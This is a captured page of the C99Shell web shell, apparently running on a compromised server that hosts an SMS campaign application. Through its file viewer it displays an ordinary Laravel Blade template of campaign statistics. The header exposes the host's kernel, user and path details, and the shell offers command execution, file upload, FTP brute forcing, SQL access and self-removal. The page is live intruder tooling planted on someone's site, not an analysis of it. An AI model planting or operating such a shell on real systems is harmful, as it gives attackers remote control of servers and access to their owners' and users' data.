!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/sms.picotech.app/public_html/resources/views/customer/campaign/   drwxr-xr-x
Free 26.61 GB of 117.98 GB (22.55%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     statistic.blade.php (14.77 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@extends('layouts.customer')

@section('title', trans('customer.Campaign_Statistic'))

@section('extra-css')
    <link rel="stylesheet" href="{{asset('plugins/datatables-bs4/css/dataTables.bootstrap4.min.css')}}">
    <link rel="stylesheet" href="{{asset('plugins/datatables-responsive/css/responsive.bootstrap4.min.css')}}">
    <style>
        .message-ov-li-a:hover{
        }
        .message-ov-li-a{
            color:black;
            padding: 8px 30px !important;
            border: hidden !important;

        }
        .message-ov-li-a.active{
            background: #5b73e8 !important;
            color: white !important;
            border-radius: 5px;
        }
    </style>
@endsection

@section('content')
    <!-- Main content -->
    <section class="content">
        <div class="row">
            <div class="col-md-12 mb-3">
                <div class="row">
                    <div class="col-lg-4 col-md-4 col-sm-12">
                        <!-- small box -->
                        <div class="small-box">
                            <div class="inner">
                                <p class="dashboard_counter mb-2">{{$totalSms?$totalSms:0}}</p>

                                <p class="counter_text">{{trans('Total SMS')}}</p>
                            </div>
                            <div class="icon today-sent-icon">
                                <i class="fa fa-paper-plane" aria-hidden="true"></i>
                            </div>
                        </div>
                    </div>

                    <div class="col-lg-4 col-md-4 col-sm-12">
                        <!-- small box -->
                        <div class="small-box">
                            <div class="inner">
                                <p class="dashboard_counter mb-2">{{$totalDeliveredSms?$totalDeliveredSms:0}}</p>

                                <p class="counter_text">{{trans('Total Delivered')}}</p>
                            </div>
                            <div class="icon total-sent-icon">
                                <i class="fa fa-american-sign-language-interpreting" aria-hidden="true"></i>
                            </div>
                        </div>
                    </div>

                    <div class="col-lg-4 col-md-4 col-sm-12">
                        <!-- small box -->
                        <div class="small-box">
                            <div class="inner">
                                <p class="dashboard_counter mb-2">{{$totalFailedSms?$totalFailedSms:0}}</p>

                                <p class="counter_text">{{trans('Total Failed')}}</p>
                            </div>
                            <div class="icon total-inbox-icon">
                                <i class="fa fa-envelope-open" aria-hidden="true"></i>
                            </div>
                        </div>
                    </div>


                </div>
            </div>
            <div class="col-md-12">
                <div class="card card-tabs">
                    <div class="card-header p-0 pt-1 border-bottom-0">
                        <ul class="nav nav-tabs" id="custom-tabs-three-tab" role="tablist">
                            <li class="nav-item mb-1">
                                <a class="nav-link active message-ov-li-a" id="custom-tabs-three-home-tab" data-toggle="pill"
                                   href="#running-message" role="tab" aria-controls="custom-tabs-three-home"
                                   aria-selected="true">{{trans('customer.running')}}</a>
                            </li>
                            <li class="nav-item mb-1">
                                <a class="nav-link message-ov-li-a" id="custom-tabs-three-profile-tab" data-toggle="pill"
                                   href="#paused-message" role="tab" aria-controls="custom-tabs-three-profile"
                                   aria-selected="false">{{trans('customer.paused')}}</a>
                            </li>
                            <li class="nav-item mb-1">
                                <a class="nav-link message-ov-li-a" id="custom-tabs-three-messages-tab" data-toggle="pill"
                                   href="#failed-message" role="tab" aria-controls="custom-tabs-three-messages"
                                   aria-selected="false">{{trans('customer.failed')}}</a>
                            </li>
                            <li class="nav-item mb-1">
                                <a class="nav-link message-ov-li-a" id="custom-tabs-three-settings-tab" data-toggle="pill"
                                   href="#delivered-message" role="tab" aria-controls="custom-tabs-three-settings"
                                   aria-selected="false">{{trans('customer.delivered')}}</a>
                            </li>
                        </ul>
                    </div>
                    <div class="card-body">
                        <div class="tab-content" id="custom-tabs-three-tabContent">
                            <div class="tab-pane fade active show" id="running-message" role="tabpanel"
                                 aria-labelledby="custom-tabs-three-home-tab">
                                <table id="campaignReports" class="table table-striped table-bordered dt-responsive nowrap">
                                    <thead>
                                    <tr>
                                        <th>@lang('customer.from')</th>
                                        <th>@lang('customer.to')</th>
                                        <th>@lang('customer.message')</th>
                                        <th>@lang('customer.schedule_at')</th>
                                    </tr>
                                    </thead>
                                    <tbody>
                                    @if($messageRunningLogs->isNotEmpty())
                                        @foreach($messageRunningLogs as $message_log)
                                            <tr>
                                                <td>{{$message_log->from}}</td>
                                                <td>{{$message_log->to}}</td>
                                                <td>
                                                    <div class="show-more">
                                                        {{$message_log->body}}
                                                    </div>
                                                </td>
                                                <td>{{($message_log->schedule_datetime)}}</td>
                                            </tr>
                                        @endforeach
                                    @else
                                        <tr class="text-center">
                                            <td colspan="5"><strong>No Data Available</strong></td>
                                        </tr>
                                    @endif
                                    </tbody>
                                </table>
                                <div class="mt-2">
                                    {{$messageRunningLogs->appends(['running' => $messageRunningLogs->currentPage()])->links()}}
                                </div>
                            </div>
                            <div class="tab-pane fade" id="paused-message" role="tabpanel"
                                 aria-labelledby="custom-tabs-three-profile-tab">
                                <table id="campaignReports" class="table table-striped table-bordered dt-responsive nowrap">
                                    <thead>
                                    <tr>
                                        <th>@lang('customer.from')</th>
                                        <th>@lang('customer.to')</th>
                                        <th>@lang('customer.message')</th>
                                        <th>@lang('customer.schedule_at')</th>
                                    </tr>
                                    </thead>
                                    <tbody>
                                    @if($messagePausedLogs->isNotEmpty())
                                        @foreach($messagePausedLogs as $message_log)
                                            <tr>
                                                <td>{{$message_log->from}}</td>
                                                <td>{{$message_log->to}}</td>
                                                <td>
                                                    <div class="show-more">
                                                        {{$message_log->body}}
                                                    </div>
                                                </td>
                                                <td>{{formatDate($message_log->schedule_datetime)}}</td>
                                            </tr>
                                        @endforeach
                                    @else
                                        <tr class="text-center">
                                            <td colspan="5"><strong>No Data Available</strong></td>
                                        </tr>
                                    @endif
                                    </tbody>
                                </table>
                                <div class="mt-2">
                                    {{$messagePausedLogs->appends(['paused' => $messagePausedLogs->currentPage()])->links()}}
                                </div>
                            </div>
                            <div class="tab-pane fade" id="failed-message" role="tabpanel"
                                 aria-labelledby="custom-tabs-three-messages-tab">
                                <table id="messageFailedLogs" class="table table-striped table-bordered dt-responsive nowrap">
                                    <thead>
                                    <tr>
                                        <th>@lang('customer.from')</th>
                                        <th>@lang('customer.to')</th>
                                        <th>@lang('customer.message')</th>
                                        <th>@lang('customer.response_code')</th>
                                        <th>@lang('customer.failed_at')</th>
                                    </tr>
                                    </thead>
                                    <tbody>
                                    @if($messageFailedLogs->isNotEmpty())
                                        @foreach($messageFailedLogs as $message_log)
                                            <tr>
                                                <td>{{$message_log->from}}</td>
                                                <td>{{$message_log->to}}</td>
                                                <td>
                                                    <div class="show-more">
                                                        {{$message_log->body}}
                                                    </div>
                                                </td>
                                                <td>{{$message_log->response_code}}</td>
                                                <td>{{formatDate($message_log->updated_at)}}</td>
                                            </tr>
                                        @endforeach
                                    @else
                                        <tr class="text-center">
                                            <td colspan="5"><strong>No Data Available</strong></td>
                                        </tr>
                                    @endif
                                    </tbody>
                                </table>
                                <div class="mt-2">
                                    {{$messageFailedLogs->appends(['failed' => $messageFailedLogs->currentPage()])->links()}}
                                </div>
                            </div>
                            <div class="tab-pane fade" id="delivered-message" role="tabpanel"
                                 aria-labelledby="custom-tabs-three-settings-tab">
                                <table id="campaignReports" class="table table-striped table-bordered dt-responsive nowrap">
                                    <thead>
                                    <tr>
                                        <th>@lang('customer.from')</th>
                                        <th>@lang('customer.to')</th>
                                        <th>@lang('customer.message')</th>
                                        <th>@lang('customer.schedule_at')</th>
                                        <th>@lang('customer.delivered_at')</th>
                                    </tr>
                                    </thead>
                                    <tbody>
                                    @if($messageDeliveredLogs->isNotEmpty())
                                        @foreach($messageDeliveredLogs as $message_log)
                                            <tr>
                                                <td>{{$message_log->from}}</td>
                                                <td>{{$message_log->to}}</td>
                                                <td>
                                                    <div class="show-more">
                                                        {{$message_log->body}}
                                                    </div>
                                                </td>
                                                <td>{{($message_log->schedule_datetime)}}</td>
                                                <td>{{formatDate($message_log->updated_at)}}</td>
                                            </tr>
                                        @endforeach
                                    @else
                                        <tr class="text-center">
                                            <td colspan="5"><strong>No Data Available</strong></td>
                                        </tr>
                                    @endif
                                    </tbody>
                                </table>
                                <div class="mt-2">
                                    {{$messageDeliveredLogs->appends(['delivered' => $messageDeliveredLogs->currentPage()])->links()}}
                                </div>
                            </div>
                        </div>
                    </div>

                </div>
            </div>

        </div>
        <!-- /.row -->
    </section>
    <!-- /.content -->
@endsection

@section('extra-scripts')
    <script>
        "use strict";

        $(".show-more").css('overflow', 'hidden').readmore({collapsedHeight: 20});
    </script>
@endsection



:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0042 ]--